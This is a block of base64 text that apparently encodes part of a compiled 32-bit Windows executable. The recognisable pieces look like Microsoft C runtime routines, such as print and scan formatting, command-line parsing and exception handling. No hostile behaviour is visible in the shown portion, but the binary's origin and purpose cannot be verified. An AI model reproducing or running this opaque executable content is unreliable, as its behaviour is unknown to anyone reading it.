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 
